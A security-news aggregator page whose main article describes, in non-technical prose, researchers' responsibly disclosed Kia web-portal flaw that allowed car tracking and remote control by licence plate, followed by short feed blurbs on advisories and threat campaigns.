cars If you think about it, in the last couple of decades, cars have essentially become big computers on wheels. Even the less smart models are packed with electronics and equipped with a range of sensors — from sonars and cameras to motion detectors and GPS. And not only that; in recent years, these computers have been constantly connected to the internet — with all the ensuing risks. Not long ago, we wrote about how todays cars collect huge amounts of data about their owners and send it to the manufacturer. Moreover, the manufacturers also sell this collected data to other companies — particularly insurers. However, theres another side to this issue: being constantly connected to the internet means that, if there are vulnerabilities — either in the car itself or in the cloud system it communicates with — someone could exploit them to hack the system and track the cars owner without the manufacturer even knowing. The so-called head unit of a car is just the tip of the iceberg; in fact, todays cars are stuffed with electronics One bug to rule them all, one bug to find them This is exactly what happened in this case. Researchers found a vulnerability in Kias web portal, which is used by Kia owners and dealers. It turned out that by using the API, the portal allowed anyone to register as a car dealer with just a few fairly simple moves. The Kia portal in which a serious vulnerability was discovered. Source This gave the attacker access to features that even car dealers shouldnt have — at least, not once the vehicle has been handed over to the customer. Specifically, the portal permits first finding any Kia car, and then accessing the owners data (name, phone number, email address, and even physical address) — all with just the vehicles VIN number. It should be noted that VIN numbers arent exactly secret information — in some countries, theyre publicly available. For instance, in the USA there are many online services you can use to look up a VIN number using a cars license plate number. A general scheme of the Kia web portal attack, allowing control over any car using its VIN number. Source After successfully finding the car, the attacker can use the owners data to register any attacker-controlled account in Kias system as a new user for the vehicle. From there, the attacker would gain access to various functions normally available to the cars actual owner through the mobile app. Whats particularly interesting is that all these features werent just available to the dealer who sold that car, but to any dealer registered in Kias system. Hacking a car in seconds The researchers then developed an experimental app that could take control of any Kia vehicle within seconds simply by entering its license plate number into the input fields. The app would automatically find the cars VIN through the relevant service and use it to register the vehicle to the researchers account. The researchers even created a handy app to simplify hacking — all you need is the Kia cars license plate number. Source After that, a single button press in the app would allow the attacker to obtain the vehicles current coordinates, lock or unlock the doors, start or stop the engine, or honk the horn. The app could be used to obtain the hacked cars coordinates and send commands. Source Its important to note that in most cases these functions wouldnt be enough to steal the car. Modern models are usually equipped with immobilizers, which require the physical presence of the key to be disabled. There are some exceptions, but generally these are the cheapest cars that are unlikely to be of much interest to thieves. Nevertheless, this vulnerability could easily be used to track the car owner, steal valuables left inside the car (or plant something there), or simply disrupt the drivers life with unexpected actions from the vehicle. The researchers followed responsible disclosure protocol, informing the manufacturer of the issue and only publishing their findings after Kia fixed the bug. However, they note that theyve found similar vulnerabilities before and are confident theyll continue to discover more in the future.

image for Mozilla: ChatGPT Can ...

 Feed

LLMs tend to miss the forest for the trees, understanding specific instructions but not their broader context. Bad actors can take advantage of this myopia to get them to do malicious things, with a new prompt-injection technique.

 Feed

Botan is a C++ library of cryptographic algorithms, including AES, DES, SHA-1, RSA, DSA, Diffie-Hellman, and many others. It also supports X.509 certificates and CRLs, and PKCS #10 certificate requests, and has a high level filter/pipe message processing system. The library is easily portable to most systems and compilers, and includes a substantial tutorial and API reference. This is the current 3.x.x release.

 Feed

Debian Linux Security Advisory 5799-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

 Feed

Debian Linux Security Advisory 5798-1 - Christoper L. Shannon discovered that the implementation of the OpenWire protocol in Apache ActiveMQ was susceptible to the execution of arbitrary code.

 Feed

Debian Linux Security Advisory 5797-1 - Multiple security issues were found in Twisted, an event-based framework for internet applications, which could result in incorrect ordering of HTTP requests or cross-site scripting.

 Feed

Debian Linux Security Advisory 5796-1 - Multiple security issues were found in libheif, a library to parse HEIF and AVIF files, which could result in denial of service or potentially the execution of arbitrary code.

 Feed

Red Hat Security Advisory 2024-8235-03 - Red Hat OpenShift Container Platform release 4.14.39 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include code execution, denial of service, and out of bounds write vulnerabilities.

 Feed

A new attack technique could be used to bypass Microsoft's Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks. "This bypass allows loading unsigned kernel drivers, enabling attackers to deploy custom rootkits that can neutralize security controls, hide processes and network activity, maintain stealth, and much more," SafeBreach

 Feed

Cybersecurity news can sometimes feel like a never-ending horror movie, can't it? Just when you think the villains are locked up, a new threat emerges from the shadows. This week is no exception, with tales of exploited flaws, international espionage, and AI shenanigans that could make your head spin. But don't worry, we're here to break it all down in plain English and arm you with the

 Feed

Cybersecurity researchers have warned of a spike in phishing pages created using a website builder tool called Webflow, as threat actors continue to abuse legitimate services like Cloudflare and Microsoft Sway to their advantage. "The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for

 Feed

Operational Technology (OT) security has affected marine vessel and port operators, since both ships and industrial cranes are being digitalized and automated at a rapid pace, ushering in new types of security challenges. Ships come to shore every six months on average. Container cranes are mostly automated. Diagnostics, maintenance, upgrade and adjustments to these critical systems are done

 Feed

A government entity and a religious organization in Taiwan were the target of a China-linked threat actor known as Evasive Panda that infected them with a previously undocumented post-compromise toolset codenamed CloudScout. "The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies," ESET security researcher Anh Ho said. "Through

 Feed

A suspected Russian hybrid espionage and influence operation has been observed delivering a mix of Windows and Android malware to target the Ukrainian military under the Telegram persona Civil Defense. Google's Threat Analysis Group (TAG) and Mandiant are tracking the activity under the name UNC5812. The threat group, which operates a Telegram channel named civildefense_com_ua, was created on

 Feed

Three malicious packages published to the npm registry in September 2024 have been found to contain a known malware called BeaverTail, a JavaScript downloader and information stealer linked to an ongoing North Korean campaign tracked as Contagious Interview. The Datadog Security Research team is monitoring the activity under the name Tenacious Pungsan, which is also known by the monikers

2024-10
Aggregator history
Monday, October 28
TUE
WED
THU
FRI
SAT
SUN
MON
OctoberNovemberDecember